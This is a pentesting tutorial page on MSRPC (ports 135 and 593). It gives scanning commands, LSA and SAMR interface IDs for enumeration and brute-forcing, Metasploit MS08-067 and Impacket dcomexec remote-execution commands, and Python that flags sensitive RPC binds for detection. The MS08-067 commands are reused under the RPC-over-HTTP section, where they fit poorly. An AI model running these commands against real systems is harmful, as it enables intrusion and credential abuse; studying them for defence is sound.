# MSRPC - Port 135, 593

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}
Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**

* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endtab %}
{% endtabs %}

## Basic info

The **Microsoft Remote Procedure Call (MSRPC)** protocol is a powerful client-server model enabling one system to request services from another over a network, forming the backbone of many Windows-based network services. Initially derived from open-source software, it was later developed and patented by Microsoft. Exposing MSRPC services, especially on **Port 135** (RPC) and **Port 593** (RPC over HTTP), creates significant vulnerabilities that penetration testers can exploit for remote code execution, privilege escalation, and lateral movement.

MSRPC allows a program to request a service from a program located on another computer in a network, abstracting the underlying network protocols and allowing cross-platform communication. MSRPC is accessed via various ports, the most common being **Port 135 (TCP/UDP)** for RPC services, **Port 593 (TCP)** for RPC over HTTP, and **Ports 139/445 (SMB)** for SMB-based RPC.

**Key Details:**

* **Port 135 (TCP/UDP)**: The RPC endpoint mapper listens on this port, which acts as the entry point for locating other RPC services on a system.
* **Port 593 (TCP)**: Used for RPC over HTTP, enabling RPC traffic to bypass network firewalls and proxies.
* **Ports 139/445 (TCP)**: These ports are primarily used by SMB for MSRPC communication.

## **How MSRPC Works**

The process begins when a **client application** initiates the request for an RPC service. Here's how it works:

* **Client Stub**: The client invokes a local procedure call (stub).
* **Runtime Library**: The stub works with the client runtime library to convert the parameters into a standardized format (Network Data Representation).
* **Communication**: If the server is remote, the runtime library determines the transport protocol (e.g., TCP, HTTP) and sends the request over the network.

The communication is usually secured via **authentication mechanisms** like NTLM or Kerberos, though these can be bypassed or exploited if misconfigured.

## **Identifying Exposed RPC Services**

Exposing RPC services over the network can be an attack vector if not properly secured. **Identifying exposed RPC services** is the first step in a pentesting assessment. You can use several tools to discover these services across different ports.

**Tools for Scanning RPC Services:**

**Nmap**:

```bash
nmap -p 135,593 -sV <target_ip>
```

**Metasploit:**

```bash
use auxiliary/scanner/dcerpc/endpoint_mapper
use auxiliary/scanner/dcerpc/hidden
use auxiliary/scanner/dcerpc/management
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
```

**Impacket** (`rpcdump.py`, queries the endpoint mapper on Port 135):

```bash
rpcdump.py <IP> -p 135
```

**rpcdump**:

```bash
rpcdump -p 135 <target_ip>
```

**Example output from rpcdump:**

```
D:\rpctools> rpcdump [-p port] <IP>
IFID: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:<IP>[1028]
```

The `rpcdump` output lists **Interface Identifiers (IFIDs)**; interfaces such as **LSA** and **SAMR** can be abused for user enumeration, password cracking, and privilege escalation.

**Common RPC Interfaces:**

* **IFID: 12345778-1234-abcd-ef00-0123456789ab**: LSA Interface (used for enumerating users).
* **IFID: 3919286a-b10c-11d0-9ba8-00c04fd92ef5**: LSA Directory Services (enumerates domains).
* **IFID: 12345778-1234-abcd-ef00-0123456789ac**: SAMR Interface (used for password brute-forcing).
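An added example (not from the original page) that ties the bind step described under "How MSRPC Works" to the IFID list above: it builds a minimal DCE/RPC connection-oriented bind PDU, parses the requested interface UUID and version back out of it, and flags binds to the LSA and SAMR interfaces, which is the check a network sensor watching Port 135 would run. The wire layout is the standard DCE/RPC bind PDU with little-endian data representation; the sample PDU and the `SENSITIVE_IFIDS` labels are constructed here.

```python
import struct
import uuid

# IFIDs listed on this page, keyed to the reason an audit flags a bind to them.
SENSITIVE_IFIDS = {
    "12345778-1234-abcd-ef00-0123456789ab": "LSA (user enumeration)",
    "3919286a-b10c-11d0-9ba8-00c04fd92ef5": "LSA Directory Services (domain enumeration)",
    "12345778-1234-abcd-ef00-0123456789ac": "SAMR (password brute-forcing)",
}
NDR_TRANSFER_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")  # NDR 2.0
PTYPE_BIND = 11


def build_bind(ifid: str, major: int, minor: int, call_id: int = 1) -> bytes:
    """Constructed sample input: a minimal DCE/RPC connection-oriented bind PDU."""
    # One presentation context: the requested interface plus one transfer syntax.
    ctx = struct.pack("<HBB", 0, 1, 0)                       # context id, n_transfer, pad
    ctx += uuid.UUID(ifid).bytes_le + struct.pack("<HH", major, minor)
    ctx += NDR_TRANSFER_SYNTAX.bytes_le + struct.pack("<HH", 2, 0)
    body = struct.pack("<HHIBBH", 4280, 4280, 0, 1, 0, 0) + ctx  # max frags, assoc group, n_ctx
    # Common header: version 5.0, PTYPE bind, first|last fragment, little-endian drep.
    header = struct.pack("<BBBB4sHHI", 5, 0, PTYPE_BIND, 0x03, b"\x10\x00\x00\x00",
                         16 + len(body), 0, call_id)
    return header + body


def parse_bind(pdu: bytes) -> list:
    """Return (ifid, major, minor) for each abstract syntax the bind PDU asks the server for."""
    if len(pdu) < 28 or pdu[0] != 5 or pdu[2] != PTYPE_BIND:
        raise ValueError("not a DCE/RPC v5 bind PDU")
    if (pdu[4] & 0xF0) != 0x10:
        raise ValueError("only little-endian data representation is handled here")
    if struct.unpack_from("<H", pdu, 8)[0] != len(pdu):
        raise ValueError("frag_length does not match PDU size (truncated or padded capture)")
    n_ctx, offset, contexts = pdu[24], 28, []
    for _ in range(n_ctx):
        n_transfer = pdu[offset + 2]
        # UUID fields are encoded per the drep (little-endian); bytes_le undoes that.
        ifid = uuid.UUID(bytes_le=pdu[offset + 4:offset + 20])
        major, minor = struct.unpack_from("<HH", pdu, offset + 20)
        contexts.append((str(ifid), major, minor))
        offset += 24 + 20 * n_transfer                       # skip the transfer-syntax list
    return contexts


def flag_sensitive_binds(pdu: bytes) -> list:
    """Detection helper: names of page-listed sensitive interfaces the bind requests."""
    return [SENSITIVE_IFIDS[i] for i, _, _ in parse_bind(pdu) if i in SENSITIVE_IFIDS]
```

Feeding `parse_bind` the bind PDUs extracted from a port 135/593 capture gives the same interface inventory `rpcdump` reports, but from the client side, so binds to SAMR or LSA from unexpected hosts stand out.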

## **Executing Remote Code Execution (RCE) with Valid Credentials**

Once you have identified the target system and hold valid credentials, the next step is to use the RPC service for Remote Code Execution (RCE). Common vulnerabilities such as **MS08-067** (RCE through NetAPI) allow attackers to execute code remotely.

**Exploitation Techniques:**

* **Metasploit**: Exploits such as MS08-067 can be used to execute arbitrary code on vulnerable machines.

  ```bash
  msfconsole
  use exploit/windows/smb/ms08_067_netapi
  set RHOST <target_ip>
  run
  ```
* **Impacket Framework**: Tools like `dcomexec.py` can execute commands remotely once you have valid credentials.

  ```bash
  python dcomexec.py DOMAIN/username:password@<target_ip>
  ```

## **RPC Over HTTP (Port 593)**

Port 593 is used for **RPC over HTTP**, which encapsulates RPC traffic in HTTP requests, allowing it to bypass firewalls and proxies that may block traditional RPC traffic on Port 135. Identifying and exploiting this port requires special tools and techniques.

**rpcdump**: Can be used to identify services running on Port 593.

```bash
rpcdump -p 593 <target_ip>
```

**Metasploit and Impacket**:

```bash
use exploit/windows/smb/ms08_067_netapi
set RHOST <target_ip>
run
```

